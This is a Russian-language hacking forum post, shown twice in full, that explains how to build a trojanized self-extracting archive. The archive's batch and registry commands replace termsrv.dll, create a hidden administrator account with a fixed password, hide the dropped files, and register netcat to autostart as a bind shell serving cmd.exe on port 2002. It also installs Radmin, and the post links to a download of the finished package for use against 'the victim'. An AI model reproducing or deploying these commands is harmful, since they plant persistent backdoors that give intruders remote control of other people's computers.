onikishov
16.02.2008, 22:36
В один прекрасный моменты:) я подумал, что было бы неплохо совместить эти 3 вещи. При запуске такого файла, что нибудь да сработает)
Итак поехали. Принцип старый. Просто подкиним к SFX архиву еще несколько файлов и поменяем 111.bat и 111.reg.
Дописываем bat
ren %SystemRoot%\system32\DLLCache\termsrv.dll termsrv.old
ren %SystemRoot%\system32\termsrv.dll termsrv.old
copy %SystemRoot%\help\123\termsrv.dll %SystemRoot%\system32\DLLCache\termsrv.dll
copy %SystemRoot%\help\123\termsrv.dll %SystemRoot%\system32\termsrv.dll
reg import key.reg
del %SystemRoot%\system32\DLLCache\termsrv.old
del %SystemRoot%\system32\termsrv.old
del %SystemRoot%\help\123\termsrv.dll
del %SystemRoot%\help\123\key.reg
net user asdf 1234 /add /expires:never /times:all
net localgroup "Ђ¤¬Ё*Ёбва*в®ал" asdf /add
del %SystemRoot%\help\123\run.cmd
attrib +r +h +s C:\Windows\Help\123\*
attrib +r +h +s C:\Windows\Help\123
Последние две строчки присваивают папке 123 и ее файлам параметры: скрытый, только чтение, системный
Дописываем reg
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run]
"nc.exe"="\"C:\\Windows\\Help\\123\\nc.exe.lnk\""
Эти строки отвечают за автозапуск nc.
Создадим ярлычок nc.exe и допишим там пару букв:
-d -L -n -e cmd.exe -v -p 2002
Ну и все осталось завернуть)м... Даже ico прилепим :D
Итого мы получили: У жертвы открыт 2002 порт, открыт удаленный доступ(пользователь:asdf, пароль:1234), стоит радмин(пароль 11223344).
Качаем ТУТ (http://depositfiles.com/files/3581114)
Пароль: antichat.ru
Итак поехали. Принцип старый. Просто подкиним к SFX архиву еще несколько файлов и поменяем 111.bat и 111.reg.
Дописываем bat
ren %SystemRoot%\system32\DLLCache\termsrv.dll termsrv.old
ren %SystemRoot%\system32\termsrv.dll termsrv.old
copy %SystemRoot%\help\123\termsrv.dll %SystemRoot%\system32\DLLCache\termsrv.dll
copy %SystemRoot%\help\123\termsrv.dll %SystemRoot%\system32\termsrv.dll
reg import key.reg
del %SystemRoot%\system32\DLLCache\termsrv.old
del %SystemRoot%\system32\termsrv.old
del %SystemRoot%\help\123\termsrv.dll
del %SystemRoot%\help\123\key.reg
net user asdf 1234 /add /expires:never /times:all
net localgroup "Ђ¤¬Ё*Ёбва*в®ал" asdf /add
del %SystemRoot%\help\123\run.cmd
attrib +r +h +s C:\Windows\Help\123\*
attrib +r +h +s C:\Windows\Help\123
Последние две строчки присваивают папке 123 и ее файлам параметры: скрытый, только чтение, системный
Дописываем reg
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run]
"nc.exe"="\"C:\\Windows\\Help\\123\\nc.exe.lnk\""
Эти строки отвечают за автозапуск nc.
Создадим ярлычок nc.exe и допишим там пару букв:
-d -L -n -e cmd.exe -v -p 2002
Ну и все осталось завернуть)м... Даже ico прилепим :D
Итого мы получили: У жертвы открыт 2002 порт, открыт удаленный доступ(пользователь:asdf, пароль:1234), стоит радмин(пароль 11223344).
Качаем ТУТ (http://depositfiles.com/files/3581114)
Пароль: antichat.ru